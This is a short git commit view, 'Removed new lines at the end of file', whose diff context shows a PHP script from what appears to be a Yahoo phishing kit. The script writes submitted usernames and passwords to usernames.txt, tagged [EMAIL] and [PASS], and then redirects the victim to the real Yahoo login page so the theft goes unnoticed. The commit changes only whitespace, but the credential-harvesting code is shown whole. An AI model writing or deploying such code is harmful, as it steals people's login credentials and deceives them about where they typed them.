Removed new lines at the end of file

This commit is contained in:
alexmozzhakov 2018-06-04 10:49:31 +03:00
parent 803b2814bc
commit fffad2f561

View File

@ -4,5 +4,3 @@ include 'base.php';
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://login.yahoo.com');
exit();